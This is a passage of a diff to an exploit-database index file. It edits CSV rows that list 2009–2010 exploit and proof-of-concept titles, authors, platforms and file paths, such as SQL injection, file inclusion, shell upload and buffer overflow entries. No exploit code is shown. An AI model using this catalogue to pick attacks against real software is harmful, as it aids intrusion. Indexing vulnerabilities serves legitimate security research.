+10840,platforms/windows/dos/10840.pl,"VLC 1.0.3 - Denial of Service PoC",2009-12-31,"D3V!L FUCKER",windows,dos,0 10841,platforms/php/webapps/10841.pl,"pL-PHP <= beta 0.9 Local File Include Exploit",2009-12-31,cr4wl3r,php,webapps,0 10842,platforms/windows/dos/10842.py,"SimplePlayer v0.2 0day (.wav) overflow DOS Exploit",2009-12-31,mr_me,windows,dos,0 10844,platforms/php/webapps/10844.txt,"Joomla Component com_portfol SQL Injection Vulnerability",2009-12-31,"wlhaan hacker",php,webapps,0 10845,platforms/php/webapps/10845.txt,"fileNice php file browser RFI and LFI Vulnerabilities",2009-12-31,e.wiZz,php,webapps,0 10846,platforms/php/webapps/10846.txt,"Weatimages Directory Traversal and LFI Vulnerabilities",2009-12-31,e.wiZz,php,webapps,0 10847,platforms/php/webapps/10847.txt,"Joomla Component com_mdigg SQL Injection Vulnerability",2009-12-31,"wlhaan hacker",php,webapps,0 -10850,platforms/php/webapps/10850.txt,"HLstatsX v1.65 SQL Injection Vulnerability",2009-12-31,bnc,php,webapps,0 -10861,platforms/php/webapps/10861.txt,"Discuz <= 1.03 SQL Injection Exploit Vulnerability",2009-12-31,indoushka,php,webapps,0 +10850,platforms/php/webapps/10850.txt,"HLstatsX 1.65 - SQL Injection Vulnerability",2009-12-31,bnc,php,webapps,0 +10861,platforms/php/webapps/10861.txt,"Discuz <= 1.03 SQL Injection Exploit Vulnerability",2009-12-31,"indoushka salah el ddine",php,webapps,0 10869,platforms/php/webapps/10869.txt,"PhotoDiary 1.3 (lng) LFI Vulnerability",2009-12-31,cOndemned,php,webapps,0 10870,platforms/multiple/dos/10870.html,"Opera 10.10 Status Bar Obfuscation",2009-12-31,"599eme Man",multiple,dos,0 10871,platforms/php/webapps/10871.txt,"Freewebscript'z Games (Auth Bypass) SQL Injection Vulnerability",2009-12-31,"Hussin X",php,webapps,0 10872,platforms/php/webapps/10872.txt,"Pre ADS Portal (cid) Remote SQL Injection Vulnerability",2009-12-31,"Hussin X",php,webapps,0 -10873,platforms/php/webapps/10873.txt,"Myiosoft EasyGallery (catid) Blind SQL Injection Vulnerability",2009-12-31,"Hussin X",php,webapps,0 +10873,platforms/php/webapps/10873.txt,"Myiosoft EasyGallery (catid) Blind SQL Injection Vulnerability",2009-12-31,"Hussin X",php,webapps,0 10874,platforms/php/webapps/10874.txt,"Pre News Manager (nid) Remote SQL Injection Vulnerability",2009-12-31,"Hussin X",php,webapps,0 10876,platforms/php/webapps/10876.txt,"PHP-MySQL-Quiz SQL Injection Vulnerability",2009-12-31,"Hussin X",php,webapps,0 -10877,platforms/php/webapps/10877.txt,"php-addressbook v3.1.5(edit.php) SQL Injection Vulnerability",2009-12-31,"Hussin X",php,webapps,0 -10878,platforms/php/webapps/10878.txt,"Invision Power Board (Trial) 2.0.4 - Backup Vulnerability",2009-12-31,indoushka,php,webapps,0 +10877,platforms/php/webapps/10877.txt,"php-addressbook 3.1.5 - (edit.php) SQL Injection Vulnerability",2009-12-31,"Hussin X",php,webapps,0 +10878,platforms/php/webapps/10878.txt,"Invision Power Board (Trial) 2.0.4 - Backup Vulnerability",2009-12-31,"indoushka salah el ddine",php,webapps,0 10879,platforms/windows/dos/10879.html,"Google Chrome 3.0195.38 Status Bar Obfuscation",2009-12-31,"599eme Man",windows,dos,0 10880,platforms/php/webapps/10880.php,"bbScript <= 1.1.2.1 (id) Blind SQL Injection Exploit",2009-12-31,cOndemned,php,webapps,0 10881,platforms/windows/dos/10881.pl,"Apollo Player 37.0.0.0 .aap BOF DOS Vulnerability",2009-12-31,jacky,windows,dos,0 -10882,platforms/php/webapps/10882.txt,"Kayako eSupport v3.04.10 XSS/CSRF Vulnerabilities",2009-12-31,"D3V!L FUCKER",php,webapps,0 +10882,platforms/php/webapps/10882.txt,"Kayako eSupport 3.04.10 - XSS/CSRF Vulnerabilities",2009-12-31,"D3V!L FUCKER",php,webapps,0 10883,platforms/asp/webapps/10883.txt,"BlogWorx 1.0 Blog Database Disclosure Vulnerability",2010-01-01,LionTurk,asp,webapps,0 10884,platforms/asp/webapps/10884.txt,"ArticleLive (blogs.php?Id) SQL Injection Vulnerability",2010-01-01,Baybora,asp,webapps,0 10885,platforms/php/webapps/10885.txt,"Cype CMS SQL Injection Vulnerability",2010-01-01,Sora,php,webapps,0 10889,platforms/php/webapps/10889.txt,"DS CMS 1.0 (NewsId) Remote SQL Injection Vulnerability",2010-01-01,Palyo34,php,webapps,0 -10891,platforms/php/webapps/10891.txt,"UCStats v1.1 SQL Injection Vulnerability",2010-01-01,Sora,php,webapps,0 +10891,platforms/php/webapps/10891.txt,"UCStats 1.1 - SQL Injection Vulnerability",2010-01-01,Sora,php,webapps,0 10897,platforms/php/webapps/10897.txt,"WD-CMS 3.0 Multiple Vulnerabilities",2010-01-01,Sora,php,webapps,0 -10899,platforms/php/webapps/10899.txt,"XlentCMS V1.0.4 (downloads.php?cat) SQL Injection Vulnerability",2010-01-01,Gamoscu,php,webapps,0 +10899,platforms/php/webapps/10899.txt,"XlentCMS 1.0.4 - (downloads.php?cat) SQL Injection Vulnerability",2010-01-01,Gamoscu,php,webapps,0 10901,platforms/php/webapps/10901.txt,"DZOIC Handshakes Auth Bypass SQL Injection",2010-01-01,R3d-D3v!L,php,webapps,0 -10902,platforms/windows/dos/10902.pl,"Nero Express v7.9.6.4 Local Heap PoC",2010-01-01,"D3V!L FUCKER",windows,dos,0 -10903,platforms/asp/webapps/10903.txt,"Mini-NUKE v2.3 Freehost Multiple Vulnerabilities",2010-01-01,LionTurk,asp,webapps,0 +10902,platforms/windows/dos/10902.pl,"Nero Express 7.9.6.4 - Local Heap PoC",2010-01-01,"D3V!L FUCKER",windows,dos,0 +10903,platforms/asp/webapps/10903.txt,"Mini-NUKE 2.3 - Freehost Multiple Vulnerabilities",2010-01-01,LionTurk,asp,webapps,0 10904,platforms/windows/dos/10904.pl,"Switch Sound File Converter .mpga BOF DOS",2010-01-01,Jacky,windows,dos,0 10905,platforms/php/webapps/10905.txt,"Joomla Component com_avosbillets Blind SQL Injection Vulnerability",2010-01-01,Pyske,php,webapps,0 10906,platforms/php/webapps/10906.txt,"DZOIC ClipHouse suffer from auth bypass remote sql injection",2010-01-02,R3d-D3v!L,php,webapps,0 -10907,platforms/windows/dos/10907.pl,"VSO Medoa Player Version 1.0.2.2 Local Denial Of Services poc",2010-01-02,SarBoT511,windows,dos,0 +10907,platforms/windows/dos/10907.pl,"VSO Medoa Player 1.0.2.2 - Local Denial Of Services poc",2010-01-02,sarbot511,windows,dos,0 10908,platforms/windows/dos/10908.pl,"GOM player V 2.1.9 Local crash poc",2010-01-02,SarBoT511,windows,dos,0 10909,platforms/windows/dos/10909.pl,"MP4 Player 4.0 Local Crash Poc",2010-01-02,SarBoT511,windows,dos,0 10910,platforms/php/webapps/10910.txt,"HLstatsX Community Edition 1.6.5 Cross Site Scripting Vulnerability",2010-01-02,Sora,php,webapps,0 10911,platforms/windows/remote/10911.py,"NetTransport Download Manager version:2.90.510 0day",2010-01-02,Lincoln,windows,remote,0 10912,platforms/php/webapps/10912.txt,"Proxyroll.com Clone PHP Script Cookie Handling Vulnerability",2010-01-02,DigitALL,php,webapps,0 -10920,platforms/windows/dos/10920.cpp,"VirtualDJ Trial v6.0.6 ""New Year Edition"" m3u Exploit (0day)",2010-01-02,"fl0 fl0w",windows,dos,0 -10921,platforms/php/webapps/10921.txt,"eazyPortal v1.0.0 Multiple Vulnerabilities",2010-01-02,"Milos Zivanovic",php,webapps,0 +10920,platforms/windows/dos/10920.cpp,"VirtualDJ Trial 6.0.6 ""New Year Edition"" - .m3u Exploit (0day)",2010-01-02,"fl0 fl0w",windows,dos,0 +10921,platforms/php/webapps/10921.txt,"eazyPortal 1.0.0 - Multiple Vulnerabilities",2010-01-02,"Milos Zivanovic",php,webapps,0 10923,platforms/php/webapps/10923.txt,"SuperLink Script <= 1.0 (id) SQL Injection Vulnerability",2010-01-02,Red-D3v1L,php,webapps,0 -10924,platforms/php/webapps/10924.txt,"AL-Athkat.v2.0 Cross Site Scripting Vulnerability",2010-01-02,indoushka,php,webapps,0 +10924,platforms/php/webapps/10924.txt,"AL-Athkat.2.0 - Cross Site Scripting Vulnerability",2010-01-02,"indoushka salah el ddine",php,webapps,0 10928,platforms/php/webapps/10928.txt,"Joomla Component com_dailymeals LFI Vulnerability",2010-01-02,FL0RiX,php,webapps,0 10929,platforms/php/webapps/10929.txt,"Wordpress Events Plugin SQL Injection Vulnerability",2010-01-02,Red-D3v1L,php,webapps,0 10930,platforms/php/webapps/10930.txt,"Left 4 Dead Stats 1.1 SQL Injection Vulnerability",2010-01-02,Sora,php,webapps,0 -10931,platforms/php/webapps/10931.txt,"X7CHAT v1.3.6b Add Admin Exploit",2010-01-02,d4rk-h4ck3r,php,webapps,0 -10936,platforms/windows/local/10936.c,"PlayMeNow Malformed M3U Playlist BOF WinXP SP2 Fr",2010-01-03,bibi-info,windows,local,0 -10938,platforms/php/webapps/10938.txt,"Service d'upload v1.0.0 Shell Upload Vulnerability",2010-01-03,indoushka,php,webapps,0 -10940,platforms/asp/webapps/10940.txt,"Football Pool v3.1 Database Disclosure Vulnerability",2010-01-03,LionTurk,asp,webapps,0 +10931,platforms/php/webapps/10931.txt,"X7CHAT 1.3.6b - Add Admin Exploit",2010-01-02,d4rk-h4ck3r,php,webapps,0 +10936,platforms/windows/local/10936.c,"PlayMeNow Malformed M3U Playlist BOF WinXP SP2 Fr",2010-01-03,bibi-info,windows,local,0 +10938,platforms/php/webapps/10938.txt,"Service d'upload 1.0.0 - Shell Upload Vulnerability",2010-01-03,"indoushka salah el ddine",php,webapps,0 +10940,platforms/asp/webapps/10940.txt,"Football Pool 3.1 - Database Disclosure Vulnerability",2010-01-03,LionTurk,asp,webapps,0 10941,platforms/php/webapps/10941.php,"Joomla Component com_aprice Blind SQL Injection Exploit",2010-01-03,FL0RiX,php,webapps,0 10942,platforms/php/webapps/10942.txt,"Joomla Component com_cartweberp LFI Vulnerability",2010-01-03,FL0RiX,php,webapps,0 10943,platforms/php/webapps/10943.txt,"Joomla Component com_biblestudy LFI Vulnerability",2010-01-03,FL0RiX,php,webapps,0 @@ -10097,11 +10097,11 @@ id,file,description,date,author,platform,type,port 10946,platforms/php/webapps/10946.txt,"Joomla Component com_bfsurvey LFI Vulnerability",2010-01-03,FL0RiX,php,webapps,0 10947,platforms/hardware/dos/10947.txt,"Facebook for iPhone persistent XSS DOS",2010-01-03,marco_,hardware,dos,0 10948,platforms/php/webapps/10948.txt,"Joomla Component com_abbrev Local File Inclusion Vulnerability",2010-01-03,FL0RiX,php,webapps,0 -10949,platforms/php/webapps/10949.txt,"Joomla Component com_countries SQL Injection Vulnerability",2010-01-03,FL0RiX,php,webapps,0 +10949,platforms/php/webapps/10949.txt,"Joomla Component com_countries SQL Injection Vulnerability",2010-01-03,FL0RiX,php,webapps,0 10950,platforms/php/webapps/10950.txt,"Joomla Component com_tpjobs Blind SQL injection Vulnerability",2010-01-03,FL0RiX,php,webapps,0 10952,platforms/php/webapps/10952.txt,"Joomla Component com_alfresco SQL Injection Vulnerability",2010-01-03,FL0RiX,php,webapps,0 10953,platforms/php/webapps/10953.txt,"Joomla Component com_hotbrackets Blind SQL Injection Vulnerability",2010-01-03,FL0RiX,php,webapps,0 -10955,platforms/asp/webapps/10955.txt,"MasterWeb Script <== 1.0 (details&newsID) SQL Injection Vulnerability",2010-01-03,Red-D3v1L,asp,webapps,0 +10955,platforms/asp/webapps/10955.txt,"MasterWeb Script <= 1.0 - (details&newsID) SQL Injection Vulnerability",2010-01-03,Red-D3v1L,asp,webapps,0 10960,platforms/multiple/dos/10960.pl,"Google Chrome 4.0.249.30 DoS PoC",2010-01-03,Anonymous,multiple,dos,0 10962,platforms/php/webapps/10962.txt,"Live TV Script SQL Injection Vulnerability",2010-01-03,R3d-D3v!L,php,webapps,0 10964,platforms/php/webapps/10964.txt,"Joomla Bridge of Hope Template SQL Injection Vulnerability",2010-01-03,R3d-D3v!L,php,webapps,0 @@ -10110,34 +10110,34 @@ id,file,description,date,author,platform,type,port 10967,platforms/php/webapps/10967.txt,"Rezervi <= 3.0.2 (mail.inc.php) RFI Vulnerability",2010-01-03,r00t.h4x0r,php,webapps,0 10968,platforms/php/webapps/10968.txt,"Portal ModulNet <= 1.0 (Id) SQL Injection Vulnerability",2010-01-03,Red-D3v1L,php,webapps,0 10971,platforms/php/webapps/10971.txt,"Joomla Bamboo Simpla Admin Template SQL Injection Vulnerability",2010-01-03,R3d-D3v!L,php,webapps,0 -10972,platforms/asp/webapps/10972.txt,"Acidcat CMS v3.5 Multiple Vulnerabilities",2010-01-03,LionTurk,asp,webapps,0 -10973,platforms/windows/remote/10973.py,"BigAnt Server v2.52 Remote Buffer Overflow Exploit 2",2010-01-03,DouBle_Zer0,windows,remote,0 -10974,platforms/php/webapps/10974.txt,"Simple Portal V2.0 <== Auth Bypass",2010-01-03,Red-D3v1L,php,webapps,0 +10972,platforms/asp/webapps/10972.txt,"Acidcat CMS 3.5 - Multiple Vulnerabilities",2010-01-03,LionTurk,asp,webapps,0 +10973,platforms/windows/remote/10973.py,"BigAnt Server 2.52 - Remote Buffer Overflow Exploit 2",2010-01-03,DouBle_Zer0,windows,remote,0 +10974,platforms/php/webapps/10974.txt,"Simple Portal <= 2.0 - Auth Bypass",2010-01-03,Red-D3v1L,php,webapps,0 10976,platforms/php/webapps/10976.txt,"WorldPay Script Shop (productdetail) SQL Injection Vulnerability",2010-01-03,Err0R,php,webapps,0 10977,platforms/php/webapps/10977.txt,"Smart Vsion Script News (newsdetail) SQL Injection Vulnerability",2010-01-03,Err0R,php,webapps,0 -10978,platforms/php/webapps/10978.txt,"Elite Gaming Ladders v3.0 SQL Injection Exploit",2010-01-03,Sora,php,webapps,0 +10978,platforms/php/webapps/10978.txt,"Elite Gaming Ladders 3.0 - SQL Injection Exploit",2010-01-03,Sora,php,webapps,0 10979,platforms/php/webapps/10979.txt,"Joomla component com_oziogallery2 / IMAGIN arbitrary file write",2010-01-03,"Ubik and er",php,webapps,0 -10980,platforms/linux/remote/10980.txt,"Skype for Linux (<=2.1 Beta) multiple strange behavior",2010-01-04,"emgent and crossbower",linux,remote,0 +10980,platforms/linux/remote/10980.txt,"Skype for Linux <= 2.1 Beta - Multiple Strange Behavior",2010-01-04,"emgent and crossbower",linux,remote,0 10981,platforms/php/webapps/10981.pl,"Smart Vision Script News (newsdetail) SQL Injection Exploit",2010-01-04,darkmasking,php,webapps,0 -10983,platforms/php/webapps/10983.txt,"Pay Per Minute Video Chat Script v2.0 and 2.1 Multiple Vulnerabilities",2010-01-04,R3d-D3v!L,php,webapps,0 -10984,platforms/php/webapps/10984.txt,"Joomla component com_cartikads Remote File Upload Vulnerability",2010-01-04,kaMtiEz,php,webapps,0 -10986,platforms/php/webapps/10986.txt,"Gbook MX v4.1.0 Arabic Version File Inclusion Vulnerability",2010-01-04,indoushka,php,webapps,0 +10983,platforms/php/webapps/10983.txt,"Pay Per Minute Video Chat Script 2.0 & 2.1 - Multiple Vulnerabilities",2010-01-04,R3d-D3v!L,php,webapps,0 +10984,platforms/php/webapps/10984.txt,"Joomla component com_cartikads Remote File Upload Vulnerability",2010-01-04,kaMtiEz,php,webapps,0 +10986,platforms/php/webapps/10986.txt,"Gbook MX 4.1.0 - Arabic Version File Inclusion Vulnerability",2010-01-04,"indoushka salah el ddine",php,webapps,0 10988,platforms/php/webapps/10988.txt,"Joomla Component com_j-projects Blind SQL Injection Vulnerability",2010-01-04,Pyske,php,webapps,0 -10991,platforms/php/webapps/10991.txt,"Ninja Blog v4.8 Multiple Vulnerabilities",2010-01-04,indoushka,php,webapps,0 -10999,platforms/multiple/webapps/10999.txt,"W-Agora 4.2.1 - Multiple Vulnerabilities",2010-01-04,indoushka,multiple,webapps,0 +10991,platforms/php/webapps/10991.txt,"Ninja Blog 4.8 - Multiple Vulnerabilities",2010-01-04,"indoushka salah el ddine",php,webapps,0 +10999,platforms/multiple/webapps/10999.txt,"W-Agora 4.2.1 - Multiple Vulnerabilities",2010-01-04,"indoushka salah el ddine",multiple,webapps,0 11002,platforms/php/webapps/11002.txt,"ImagoScripts Deviant Art Clone SQL Injection Vulnerability",2010-01-04,alnjm33,php,webapps,0 11003,platforms/php/webapps/11003.txt,"LightOpen CMS Remote File Inclusion (smarty.php)",2010-01-04,"Zer0 Thunder",php,webapps,0 -11005,platforms/asp/webapps/11005.txt,"KMSoft Guestbook v1.0 Database Disclosure Vulnerability",2010-01-04,LionTurk,asp,webapps,0 -11008,platforms/asp/webapps/11008.txt,"YP Portal MS-Pro Surumu 1.0 DB Download Vulnerability",2010-01-05,indoushka,asp,webapps,0 +11005,platforms/asp/webapps/11005.txt,"KMSoft Guestbook 1.0 - Database Disclosure Vulnerability",2010-01-04,LionTurk,asp,webapps,0 +11008,platforms/asp/webapps/11008.txt,"YP Portal MS-Pro Surumu 1.0 DB Download Vulnerability",2010-01-05,"indoushka salah el ddine",asp,webapps,0 11009,platforms/multiple/dos/11009.pl,"Novell Netware CIFS And AFP Remote Memory Consumption DoS",2010-01-05,"Francis Provencher",multiple,dos,0 -11010,platforms/windows/local/11010.rb,"PlayMeNow v7.3 and 7.4 Buffer Overflow (meta)",2010-01-06,Blake,windows,local,0 +11010,platforms/windows/local/11010.rb,"PlayMeNow 7.3 & 7.4 - Buffer Overflow (meta)",2010-01-06,Blake,windows,local,0 11012,platforms/php/webapps/11012.txt,"ITaco Group ITaco.biz (view_news) SQL Injection Vulnerability",2010-01-06,Err0R,php,webapps,0 11013,platforms/php/webapps/11013.txt,"PHPDirector Game Edition Multiple Vulnerabilities (LFI/SQLi/Xss)",2010-01-06,"Zer0 Thunder",php,webapps,0 11014,platforms/php/webapps/11014.txt,"Myuploader >> upload shell exploit",2010-01-06,S2K9,php,webapps,0 -11015,platforms/asp/webapps/11015.txt,"Lebi soft Ziyaretci Defteri_v7.5 DB Download Vulnerability",2010-01-06,"indoushka ",asp,webapps,0 -11016,platforms/asp/webapps/11016.txt,"Net Gitar Shopv1.0 DB Download Vulnerability",2010-01-06,indoushka,asp,webapps,0 -11017,platforms/php/webapps/11017.txt,"PHPDug version 2.0.0 Cross Site Scripting Vulnerability",2010-01-06,"indoushka ",php,webapps,0 -11018,platforms/asp/webapps/11018.txt,"VP-ASP Shopping Cart 7.0 DB Download Vulnerability",2010-01-06,indoushka,asp,webapps,0 +11015,platforms/asp/webapps/11015.txt,"Lebi soft Ziyaretci Defteri 7.5 - DB Download Vulnerability",2010-01-06,"indoushka salah el ddine",asp,webapps,0 +11016,platforms/asp/webapps/11016.txt,"Net Gitar Shop 1.0 - DB Download Vulnerability",2010-01-06,"indoushka salah el ddine",asp,webapps,0 +11017,platforms/php/webapps/11017.txt,"PHPDug 2.0.0 - Cross Site Scripting Vulnerability",2010-01-06,"indoushka salah el ddine",php,webapps,0 +11018,platforms/asp/webapps/11018.txt,"VP-ASP Shopping Cart 7.0 DB Download Vulnerability",2010-01-06,"indoushka salah el ddine",asp,webapps,0 11019,platforms/php/webapps/11019.txt,"MobPartner Counter - Remote File Upload Vulnerability",2010-01-06,"wlhaan hacker",php,webapps,0 11020,platforms/windows/dos/11020.pl,"[GOM Audio Local crash poc]",2010-01-06,applicationlayer,windows,dos,0 11021,platforms/windows/dos/11021.txt,"Flashget 3.x IEHelper Remote Exec 0day PoC",2010-01-06,superli,windows,dos,0 @@ -10156,22 +10156,22 @@ id,file,description,date,author,platform,type,port 11035,platforms/php/webapps/11035.txt,"Joomla Component com_king Blind SQL Injection Vulnerability",2010-01-06,Pyske,php,webapps,0 11036,platforms/php/webapps/11036.txt,"RoundCube Webmail Multiple Vulerabilities",2010-01-06,"j4ck and Globus",php,webapps,0 11043,platforms/hardware/dos/11043.txt,"Total Multimedia Features DoS PoC for Sony Ericsson Phones",2010-01-06,Aodrulez,hardware,dos,0 -11044,platforms/linux/dos/11044.txt,"Gnome Panel <= 2.28.0 Denial of Service PoC 0-day",2010-01-06,"Pietro Oliva",linux,dos,0 +11044,platforms/linux/dos/11044.txt,"Gnome Panel <= 2.28.0 - Denial of Service PoC (0day)",2010-01-06,"Pietro Oliva",linux,dos,0 11045,platforms/php/webapps/11045.txt,"SpawCMS Editor Shell Upload Vulnerability",2010-01-06,j4ck,php,webapps,0 -11046,platforms/windows/local/11046.py,"Quick Player v1.2 Unicode BOF - bindshell",2010-01-06,sinn3r,windows,local,0 +11046,platforms/windows/local/11046.py,"Quick Player 1.2 -Unicode BOF - bindshell",2010-01-06,sinn3r,windows,local,0 11047,platforms/php/webapps/11047.txt,"Zeeways Technology (product_desc.php) SQL Injection Vulnerability",2010-01-07,Gamoscu,php,webapps,0 11048,platforms/php/webapps/11048.txt,"Ulisse's Scripts 2.6.1 ladder.php SQL Injection Vulnerability",2010-01-07,Sora,php,webapps,0 11051,platforms/php/webapps/11051.txt,"AutoIndex PHP Script (index.php) Directory Traversal Vulnerability",2010-01-07,Red-D3v1L,php,webapps,0 11052,platforms/windows/dos/11052.pl,"Kantaris 0.5.6 local Denial of service Poc",2010-01-07,Anonymous,windows,dos,0 11053,platforms/windows/dos/11053.py,"ttplayer=5.6Beta3 Dos POC",2010-01-07,"t-bag YDteam",windows,dos,0 -11057,platforms/php/webapps/11057.txt,"Read Excel Script v1.1 Shell Upload Vulnerability",2010-01-07,Yozgat.Us,php,webapps,0 +11057,platforms/php/webapps/11057.txt,"Read Excel Script 1.1 - Shell Upload Vulnerability",2010-01-07,Yozgat.Us,php,webapps,0 11059,platforms/windows/remote/11059.html,"JcomBand toolbar on IE ActiveX Buffer Overflow Exploit",2010-01-07,"germaya_x and D3V!L FUCKER",windows,remote,0 11060,platforms/php/webapps/11060.txt,"0day Drupal <= 6.15 Multiple Permanent XSS",2010-01-07,emgent,php,webapps,80 11061,platforms/php/webapps/11061.txt,"Joomla Component Regional Booking (id) Blind SQL Injection Vulnerability",2010-01-07,"Hussin X",php,webapps,0 11062,platforms/windows/dos/11062.txt,"SopCast SopCore Control ActiveX Remote Exec 0day PoC",2010-01-08,superli,windows,dos,0 11063,platforms/php/webapps/11063.txt,"CU Village CMS Site 1.0 (print_view) Blind SQL Injection Vulnerability",2010-01-08,Red-D3v1L,php,webapps,0 11064,platforms/windows/dos/11064.txt,"UUSee ReliPlayer ActiveX Remote Exec 0day PoC",2010-01-08,superli,windows,dos,0 -11065,platforms/windows/dos/11065.html,"SPlayer XvidDecoder v3.3 ActiveX Remote Exec 0day PoC",2010-01-08,superli,windows,dos,0 +11065,platforms/windows/dos/11065.html,"SPlayer XvidDecoder 3.3 - ActiveX Remote Exec 0day PoC",2010-01-08,superli,windows,dos,0 11068,platforms/php/webapps/11068.txt,"Joomla Component com_ksadvertiser SQL Injection Vulnerability",2010-01-08,FL0RiX,php,webapps,0 11069,platforms/php/webapps/11069.txt,"DELTAScripts PHPLinks (catid) SQL Injection Vulnerability",2010-01-08,"Hamza 'MizoZ' N.",php,webapps,0 11070,platforms/windows/dos/11070.txt,"Windows Live Messenger 2009 ActiveX DoS Vulnerability",2010-01-08,"HACKATTACK IT SECURITY GmbH",windows,dos,0 @@ -10190,12 +10190,12 @@ id,file,description,date,author,platform,type,port 11088,platforms/php/webapps/11088.txt,"Joomla Component com_jcollection Directory Traversal",2010-01-10,FL0RiX,php,webapps,0 11089,platforms/php/webapps/11089.txt,"Joomla Component com_jvideodirect Directory Traversal",2010-01-10,FL0RiX,php,webapps,0 11090,platforms/php/webapps/11090.txt,"Joomla Component com_jashowcase Directory Traversal",2010-01-10,FL0RiX,php,webapps,0 -11093,platforms/windows/local/11093.rb,"Soritong v1.0 Universal BOF-SEH (META)",2010-01-10,FB1H2S,windows,local,0 +11093,platforms/windows/local/11093.rb,"Soritong 1.0 - Universal BOF-SEH (META)",2010-01-10,FB1H2S,windows,local,0 11094,platforms/php/webapps/11094.txt,"Simply Classified 0.2 XSS & CSRF Vulnerabilities",2010-01-10,mr_me,php,webapps,0 11095,platforms/windows/dos/11095.txt,"YPOPS! v0.9.7.3 Buffer Overflow (SEH)",2010-01-10,blake,windows,dos,0 -11096,platforms/asp/webapps/11096.txt,"ABB v1.1 Forum Remote Database Disclosure Vulnerability",2010-01-10,ViRuSMaN,asp,webapps,0 -11097,platforms/asp/webapps/11097.txt,"Egreetings v1.0 b Remote Database Disclosure Vulnerability",2010-01-10,ViRuSMaN,asp,webapps,0 -11098,platforms/asp/webapps/11098.txt,"E-membres v1.0 Remote Database Disclosure Vulnerability",2010-01-10,ViRuSMaN,asp,webapps,0 +11096,platforms/asp/webapps/11096.txt,"ABB 1.1 - Forum Remote Database Disclosure Vulnerability",2010-01-10,ViRuSMaN,asp,webapps,0 +11097,platforms/asp/webapps/11097.txt,"Egreetings 1.0 b - Remote Database Disclosure Vulnerability",2010-01-10,ViRuSMaN,asp,webapps,0 +11098,platforms/asp/webapps/11098.txt,"E-membres 1.0 - Remote Database Disclosure Vulnerability",2010-01-10,ViRuSMaN,asp,webapps,0 11101,platforms/hardware/webapps/11101.txt,"Multiple D-Link Routers Authentication Bypass Vulnerability",2010-01-10,"SourceSec DevTeam",hardware,webapps,0 11103,platforms/windows/dos/11103.html,"VLC Player v0.8.6i ActiveX DoS PoC",2010-01-10,"D3V!L FUCKER and germaya_x",windows,dos,0 11104,platforms/php/webapps/11104.txt,"CMScontrol 7.x File Upload",2010-01-11,Cyber_945,php,webapps,0 @@ -10207,17 +10207,17 @@ id,file,description,date,author,platform,type,port 11112,platforms/windows/local/11112.c,"HTMLDOC 1.9.x-r1629 local .html buffer overflow(win32) exploit",2010-01-11,"fl0 fl0w",windows,local,0 11113,platforms/php/webapps/11113.txt,"tincan ltd (section) SQL Injection Vulnerability",2010-01-11,altbta,php,webapps,0 11116,platforms/php/webapps/11116.html,"Alwjeez Script Database Backup Exploit",2010-01-11,alnjm33,php,webapps,0 -11117,platforms/hardware/dos/11117.py,"Apple Iphone/Ipod - Udisk FTP Basic Edition Remote 0day DoS Exploit",2010-01-12,mr_me,hardware,dos,8080 +11117,platforms/hardware/dos/11117.py,"iOS Udisk FTP Basic Edition - Remote 0day DoS Exploit",2010-01-12,mr_me,hardware,dos,8080 11120,platforms/php/webapps/11120.txt,"LayoutCMS 1.0 (SQL/XSS) Multiple Vulnerabilities",2010-01-12,Red-D3v1L,php,webapps,0 11124,platforms/php/webapps/11124.txt,"CiviCRM 3.1 < Beta 5 Multiple XSS Vulnerabilities",2010-01-13,h00die,php,webapps,0 -11125,platforms/hardware/dos/11125.pl,"SwiFTP v1.11 Overflow Dos PoC",2010-01-13,"Julien Bedard",hardware,dos,2121 +11125,platforms/hardware/dos/11125.pl,"SwiFTP 1.11 - Overflow DoS PoC",2010-01-13,"Julien Bedard",hardware,dos,2121 11126,platforms/php/webapps/11126.txt,"Populum 2.3 SQL injection vulnerability",2010-01-13,SiLeNtp0is0n,php,webapps,80 -11127,platforms/php/webapps/11127.txt,"Hesk Help Desk 2.1 XSRF",2010-01-13,The.Morpheus,php,webapps,80 +11127,platforms/php/webapps/11127.txt,"Hesk Help Desk 2.1 - CSRF",2010-01-13,The.Morpheus,php,webapps,80 11130,platforms/windows/dos/11130.pl,"Ofilter Player (skin.ini) Local Crash PoC",2010-01-13,"Rehan Ahmed",windows,dos,0 11131,platforms/windows/dos/11131.pl,"TurboFTP Server 1.00.712 Remote DoS",2010-01-13,corelanc0d3r,windows,dos,0 11132,platforms/windows/dos/11132.pl,"Nemesis Player (NSP) Local Denial of Service (DoS) Vulnerability",2010-01-13,"Rehan Ahmed",windows,dos,0 11133,platforms/windows/dos/11133.pl,"NPlayer (.dat Skin File) Local Heap Overflow PoC",2010-01-13,"Rehan Ahmed",windows,dos,0 -11134,platforms/asp/webapps/11134.txt,"Asp VevoCart Control System Version 3.0.4 DB Download Vulnerability",2010-01-13,indoushka,asp,webapps,0 +11134,platforms/asp/webapps/11134.txt,"Asp VevoCart Control System 3.0.4 - DB Download Vulnerability",2010-01-13,"indoushka salah el ddine",asp,webapps,0 11135,platforms/php/webapps/11135.txt,"PSI CMS v. 0.3.1 SQLi Vulns",2010-01-13,"learn3r hacker",php,webapps,0 11136,platforms/php/webapps/11136.txt,"Public Media Manager SQLi vulns",2010-01-13,"learn3r hacker",php,webapps,0 11138,platforms/windows/remote/11138.c,"Apple iTunes 8.1.x (daap) Buffer overflow remote exploit (CVE-2009-0950)",2010-01-14,Simo36,windows,remote,0 @@ -10225,15 +10225,15 @@ id,file,description,date,author,platform,type,port 11140,platforms/php/webapps/11140.txt,"Joomla Component com_articlemanager SQL Injection Vulnerability",2010-01-14,FL0RiX,php,webapps,0 11141,platforms/php/webapps/11141.txt,"dokuwiki 2009-12-25 Multiple Vulnerabilities",2010-01-14,IHTeam,php,webapps,0 11142,platforms/multiple/dos/11142.txt,"Multiple Media Player HTTP DataHandler Overflow (Itunes, Quicktime, etc)",2010-01-15,Dr_IDE,multiple,dos,0 -11145,platforms/windows/dos/11145.pl,"OtsTurntables Free v1.00.047 SEH Overwrite POC",2010-01-15,Darkb0x,windows,dos,0 -11146,platforms/windows/local/11146.py,"BS.Player v2.51 SEH Overwrite Vulnerability",2010-01-15,"Mert SARICA",windows,local,0 +11145,platforms/windows/dos/11145.pl,"OtsTurntables Free 1.00.047 - SEH Overwrite POC",2010-01-15,DarkB0x,windows,dos,0 +11146,platforms/windows/local/11146.py,"BS.Player 2.51 - SEH Overwrite Vulnerability",2010-01-15,"Mert SARICA",windows,local,0 11147,platforms/php/webapps/11147.txt,"Max's File Uploader Shell Upload Vulnerability",2010-01-15,S2K9,php,webapps,0 11148,platforms/php/webapps/11148.txt,"PonVFTP Bypass and Shell Upload 